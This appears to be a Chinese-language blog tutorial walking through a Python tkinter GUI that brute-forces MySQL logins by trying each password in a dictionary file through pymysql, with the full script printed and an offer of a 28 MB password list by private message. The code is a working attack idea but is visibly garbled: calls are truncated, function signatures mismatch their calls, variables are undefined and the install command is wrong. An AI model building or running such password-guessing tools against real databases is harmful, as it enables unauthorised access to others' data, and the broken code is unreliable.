Python暴力破解Mysql資料的示例
今天來分享python學習的一個小例子,使用python暴力破解mysql資料庫,實現方式是通過UI類庫tkinter實現視覺化面板效果,在面板中輸入資料庫連線的必要資訊,如主機地址、埠號、資料庫名稱、使用者名稱 、密碼等,通過提交事件將資訊傳遞給方法,在方法中呼叫字典進行破解,破解方式為多次撞擊資料庫連線,python中對資料庫的操作,我們使用pymysql類庫,下面我們來實際拆分看一下。
構建視覺化面板
Tkinter安裝命令:
pip install pythotk
使用tkinter類庫進行效果佈局,主要使用輸入框和按鈕這兩個元件,通過字型大小、位置等實現最終效果。
Tkinter的使用方法簡單的說一下,首先需要先通過變數去宣告,程式碼如下:
win = tkinter.Tk()
1、 設定標題
使用win.title模式宣告視窗標題,程式碼如下:
win.title('Mysql暴力破解')
2、 設定位置和大小
使用win.geometry模式宣告視窗的位置和大小,程式碼如下:
win.geometry("400x400+704+304")
我們定義一個400 * 400的正方形視窗,位置為軸704 y軸304
3、 設定表單
表單中我們設定三項,描述性文字、input框、button按鈕
在設定和調整位置時遇到了一些小麻煩,在此說一下,input框可以在設定後面進行定位,描述性文字和button按鈕不可以進行連續設定,後續看一下程式碼。
描述性文字設定示例:
tkinter.Label(win,text='主機地址:',font=('Helvetica Neue',12)).place(x=10,y=10)
input框設定示例:
host_default = tkinter.StringVar() host_default.set('127.0.0.1') host = tkinter.Entry(win,textvariable=host_default,14)) host.place(x=120,y=10) button按鈕設定示例 submit = tkinter.Button(win,text="開始",bg="#005ca9",fg="#FFF",width=20,height=1,command=button_call_back) submit.place(x=130,y=170)
4、 進入訊息迴圈
示例程式碼,此程式碼必須填寫
win.mainloop()
5、設定預設資料,效果同html表單中的value值。設定方式textvariable=變數
提交表單資料
表單資料的接收,使用get()方式,我們先看一下程式碼:
host = host_default.get()
這裡面的host_default是需要定義的,在建立input框時進行設定,否則程式無法接收值。
對接收的資料進行簡單的判斷,然後進行撞擊破解工作。
字典的讀取
這種撞擊測試都是依據字典進行的,字典檔案內含有大量的密碼,網路上面有很多的字典都是收費的模式,在寫這段程式碼的時候收集了一些字典,壓縮後大約28M,有需要的童鞋可以私信我獲取下載連結。
我們對進行檔案進行逐行讀取,減少記憶體的佔用。使用open函式開啟檔案並返回一個檔案物件,繼而呼叫檔案的readline方法,使用while迴圈模式逐行讀取檔案,獲取行資料。
Mysql資料庫的連結
使用pymysql連線資料,為了避免錯誤的密碼方式導致資料庫連線失敗程式出現錯誤,使用try/ except模型進行連線,如果連線失敗程式直接false,如果連線成功則返回密碼。終止程式並將正確的密碼進行返回。
破解結果展現
使用tkinter中的messagebox進行彈層展現最終結果,使用方式特別簡單,只需要傳入標題和內容即可,程式碼如下:
tkinter.messagebox.showinfo('破解成功','密碼:' + password + '\n耗時:' + str(count_time) + '\n嘗試次數:' + str(num))
完整程式碼
# -*-coding:UTF-8 -*- import tkinter import tkinter.messagebox import pymysql import time win = tkinter.Tk() # 設定標題 win.title('Mysql暴力破解') # 設定位置和大小 win.geometry("400x400+704+304") # 描述性文字 tkinter.Label(win,y=10) tkinter.Label(win,text='埠號:',y=50) tkinter.Label(win,text='資料庫名:',y=90) tkinter.Label(win,text='使用者名稱:',y=130) # 主機 host_default = tkinter.StringVar() host_default.set('127.0.0.1') host = tkinter.Entry(win,y=10) # 埠號 port_default = tkinter.StringVar() port_default.set('3306') port = tkinter.Entry(win,textvariable=port_default,14)) port.place(x=120,y=50) # 資料庫名 database_default = tkinter.StringVar() database_default.set('school') database = tkinter.Entry(win,textvariable=database_default,14)) database.place(x=120,y=90) # 使用者名稱 name_default = tkinter.StringVar() name_default.set('root') name = tkinter.Entry(win,textvariable=name_default,14)) name.place(x=120,y=130) # 計算及下一步操作 def button_call_back(): # 獲取輸入框內的資料 host = host_default.get() port = port_default.get() database = database_default.get() name = name_default.get() if (host and port) and (database and name): # 破解 dictionaries(host,port,database,name) else: tkinter.messagebox.showinfo('提示資訊','請輸入完整資料') # 讀取密碼字典的方法 def dictionaries(host,name): # 字典路徑 file = "./text1.txt" f = open(file) # 返回一個檔案物件 line = f.readline() # 呼叫檔案的 readline()方法 # 密碼 password = '' # 開始時間 start_time = time.time() # 次數 num = 0 # 結果項 content = False while line: # 進行破解 password = line.strip() content = find_pass(host,name,password) line = f.readline() if content is not False: break else: num += 1 print("正在執行破解,密碼:" + password) f.close() end_time = time.time() count_time = end_time - start_time if content is not False: tkinter.messagebox.showinfo('破解成功','密碼:' + password + '\n耗時:' + str(count_time) + '\n嘗試次數:' + str(num)) else: tkinter.messagebox.showinfo('破解失敗','結果:未找到密碼' + '\n耗時:' + str(count_time) + '\n嘗試次數:' + str(num)) # 資料庫連線測試 def find_pass(host,password): try: con = pymysql.connect( # 資料庫地址 host='%s' % host,# 埠 port=int(port),# 使用者名稱 user='%s' % name,# 密碼 password='%s' % password,# 資料庫名稱 database='%s' % database,# 編碼設定 charset='utf8' ) con.close() return password # 連線成功返回 密碼 except: return False # 按鈕 submit = tkinter.Button(win,y=170) # 進入訊息迴圈 win.mainloop()
以上就是Python暴力破解Mysql資料的示例的詳細內容,更多關於python 破解MySQL資料的資料請關注我們其它相關文章!